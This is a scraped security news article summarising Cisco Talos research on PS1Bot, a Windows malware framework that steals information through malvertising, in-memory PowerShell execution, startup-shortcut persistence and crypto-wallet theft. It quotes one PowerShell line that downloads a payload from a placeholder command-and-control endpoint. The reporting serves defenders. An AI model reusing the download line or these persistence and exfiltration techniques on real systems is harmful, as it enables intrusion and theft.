A sophisticated new malware campaign targeting Windows systems has emerged, employing a multi-stage framework dubbed \u201cPS1Bot\u201d that combines PowerShell and C# components to conduct extensive information theft operations.<\/p>\n
The malware represents a significant evolution in attack methodologies, utilizing modular architecture and in-memory execution techniques to evade traditional detection mechanisms while maintaining persistent access to compromised systems.<\/p>\n
PS1Bot operates through malvertising campaigns that deliver compressed archives with filenames designed to match search engine optimization patterns, such as \u201cchapter 8 medicare benefit policy manual.zip\u201d and \u201cCounting Canadian Money Worksheets Pdf.zip.e49\u201d.<\/p>\n
These seemingly legitimate files contain a JavaScript<\/a> downloader named \u201cFULL DOCUMENT.js\u201d that initiates the infection chain by retrieving additional malicious components from attacker-controlled servers.<\/p>\n The malware\u2019s modular design enables threat actors to deploy various specialized components on-demand, including information stealers, keyloggers, screen capture tools, and persistence<\/a> mechanisms.<\/p>\n Cisco Talos analysts noted<\/a> that PS1Bot has been extremely active throughout 2025, with new samples being observed continuously, indicating ongoing development and refinement of the framework.<\/p>\n What distinguishes PS1Bot from conventional malware is its emphasis on stealth through minimal disk footprint and extensive use of in-memory execution.<\/p>\n The framework leverages PowerShell\u2019s Invoke-Expression (IEX) functionality to dynamically execute modules without writing them to disk, significantly reducing the likelihood of detection by traditional antivirus solutions.<\/p>\n PS1Bot implements a particularly clever persistence strategy that creates randomly-named PowerShell scripts within the %PROGRAMDATA% directory alongside corresponding shortcut files.<\/p>\n The malware generates a malicious LNK file in the Windows Startup directory that points to these PowerShell scripts, ensuring reactivation after system reboots.<\/p>\n The persistence module retrieves obfuscated<\/a> payloads from the command and control server\u2019s \u201c\/transform\u201d endpoint, as demonstrated in the following code structure:-<\/p>\n This payload contains the same C2 polling logic used in the initial infection, creating a self-perpetuating cycle.<\/p>\n The malware constructs unique communication URLs using the infected system\u2019s C: drive serial number, enabling individualized tracking of compromised machines while maintaining operational security.<\/p>\n The framework\u2019s information theft capabilities are particularly concerning, targeting cryptocurrency wallets through embedded wordlists containing seed phrase combinations in multiple languages.<\/p>\n PS1Bot scans the file system for documents containing wallet recovery phrases and password files, compressing and exfiltrating this sensitive data via HTTP POST requests to attacker infrastructure.<\/p>\n Cisco Talos researchers identified significant code similarities between PS1Bot and previously reported malware families, including AHK Bot and components associated with Skitnet campaigns, suggesting potential shared development resources or threat actor collaboration across these operations.<\/p>\n The post Threat Actors Attacking Windows Systems With New Multi-Stage Malware Framework PS1Bot<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiMp2foIbISZdaak8fXp6VzBripQp_us0M1ZosZxSmqDVBGMokBNe5q1iDOLg2zOMtgiaO4WLbP_pfa9cl8A3tWO399brB7Pa4jN0jCLA6nPUEEHx2gDf9dLQS2AaENAw8mrbjXoF8lZ3WCFl7BHTx49AOzffL0Fgh4tZzVfUmqUICGqph0oDfo2jDx_rU\/s16000\/Deobfuscating%2520the%2520downloader%2520script%2520%28Source%2520-%2520Cisco%2520Talos%29.webp?ssl=1\")
Sophisticated Persistence and Evasion Mechanisms<\/strong><\/h2>\n
$url = \"http:\/\/[C2_SERVER]\/transform\"\n$content = (New-Object Net.WebClient).DownloadString($url)\n# Content is then deobfuscated and written to randomly-named PS1 file<\/code><\/pre>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjTaiPSKKpjvSu828WEjnq5cNzazQ4suqr-Ao9fPwkwVrYX4gU8trVTrmQUd-hTmIJ-nljwfogn1r0sSt5sA4frZMG-b5bUAASMecb47awCBkeuLanAer6WT7IMf8aeU7RtI_JkintRE87j71LgV8_RYPlRgbHwsujkqvGROm7s8M6ZKxMHJ8P7hSPPIiI\/s16000\/Example%2520HTTP%2520POST%2520containing%2520Base64%2520encoded%2520screenshot%2520image%2520file%2520%28Source%2520-%2520Cisco%2520Talos%29.webp?ssl=1\")
Boost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n